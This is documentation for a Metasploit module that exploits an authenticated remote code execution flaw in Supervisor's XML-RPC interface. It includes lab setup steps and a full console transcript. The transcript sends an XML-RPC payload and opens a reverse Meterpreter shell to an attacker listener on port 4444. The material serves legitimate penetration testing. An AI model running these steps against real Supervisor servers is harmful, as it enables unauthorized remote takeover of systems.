adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
baacd6f2bfd4ae2fe0552e26e4f4d154d4c90183
metasploit-gs/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
T
h00die 9528f279a5 cleaned up version, and docs
2017-09-23 10:51:52 -04:00

2.4 KiB
Raw Blame History

Vulnerable Application

This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2

This has been tested with versions 3.2.0 and 3.3.2

Creating A Testing Environment

At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.

  1. sudo apt-get install supervisor
  2. Enable Web interface/XML-RPC server in Supervisor config in /etc/supervisor/supervisord.conf
```
[inet_http_server]         ; inet (TCP) server disabled by default
port=:9001        ; ip_address:port specifier, *:port for all iface
username=user              ; default is no username (open server)
password=123               ; default is no password (open server)
```
  1. Restart the service: sudo service supervisor restart

Verification Steps

  1. use exploit/linux/http/supervisor_xmlrpc_exec
  2. set lhost [IP]
  3. set rhost [IP]
  4. set httpusername user
  5. set httppassword 123
  6. exploit
  7. A meterpreter session should have been opened successfully

Options

HttpUsername

Username for HTTP basic auth which is set in the conf file(optional)

HttpPassword

Password for HTTP basic auth which is set in the conf file(optional)

TARGETURI

The path to the XML-RPC endpoint

Scenarios

Supervisor 3.2.0 on Xubuntu 16.04

msf > use exploit/linux/http/supervisor_xmlrpc_exec 
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
httpusername => user
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
httppassword => 123
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
rhost => 192.168.0.19
msf exploit(supervisor_xmlrpc_exec) > check 

[*] Extracting version from web interface..
[*] Using basic auth (user:123)
[+] Vulnerable version found: 3.2.0
[*] 192.168.0.19:9001 The target appears to be vulnerable.
msf exploit(supervisor_xmlrpc_exec) > exploit 

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
[*] Using basic auth (user:123)
[*] Sending stage (2878872 bytes) to 192.168.0.19
[*] Command Stager progress - 100.00% done (782/782 bytes)
[+] Request timeout, usually indicates success. Passing to handler..
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100

meterpreter >
Reference in New Issue View Git Blame Copy Permalink